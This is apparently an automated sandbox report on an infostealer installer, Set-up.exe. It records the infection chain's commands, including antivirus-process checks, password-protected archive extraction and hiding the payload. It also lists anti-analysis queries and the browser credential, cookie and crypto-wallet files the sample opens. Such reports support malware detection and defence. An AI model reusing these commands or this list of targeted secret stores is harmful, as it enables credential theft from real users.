    Source: 7z.dll.16.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
    Source: Installer.exe.31.drStatic PE information: real checksum: 0x3425e should be: 0xa3dbd
    Source: 7z.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_004192C0 push eax; ret 16_2_004192EE
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0013676A push rcx; ret 20_2_0013676B

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E41280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,Concurrency::cancel_current_task,33_2_00E41280
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile created: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeJump to dropped file
    Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E4129033_2_00E41290
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E4128033_2_00E41280
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSystem information queried: FirmwareTableInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeAPI coverage: 5.1 %
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeAPI coverage: 3.7 %
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E4128033_2_00E41280
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pif TID: 5964Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe TID: 6320Thread sleep time: -40000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,16_2_0040367D
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,16_2_004031DC
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00117978 FindFirstFileW,FindFirstFileW,free,20_2_00117978
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E4A151 FindFirstFileExW,33_2_00E4A151
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0011881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,20_2_0011881C
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0011B5E0 GetSystemInfo,20_2_0011B5E0
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeThread delayed: delay time: 40000
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\506033\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\506033Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E420FF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_00E420FF
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E46B54 mov eax, dword ptr fs:[00000030h]33_2_00E46B54
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E4B52D mov eax, dword ptr fs:[00000030h]33_2_00E4B52D
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E4BFD4 GetProcessHeap,33_2_00E4BFD4
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E420FF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_00E420FF
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E42262 SetUnhandledExceptionFilter,33_2_00E42262
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E42375 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_00E42375
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E45E89 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_00E45E89
    Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Crest Crest.bat & Crest.batJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 506033Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "RubberBrilliantPoliceOperator" Count Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Lil + ..\Labeled + ..\Warren + ..\Current + ..\Endless + ..\Towers + ..\Based WJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\506033\Limitations.pif Limitations.pif WJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p29586644319935208542739921766 -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_11.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_10.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_9.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_8.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_00402744 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,16_2_00402744
    Source: Set-up.exe, 00000000.00000003.2163100883.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, Limitations.pif, 0000000B.00000000.2200247856.0000000000646000.00000002.00000001.01000000.00000006.sdmp, Amazing.0.dr, Limitations.pif.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0015D670 cpuid 20_2_0015D670
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,16_2_0040247D
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_004039E7 lstrlenW,GetSystemTimeAsFileTime,GetFileAttributesW,memcpy,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,16_2_004039E7
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
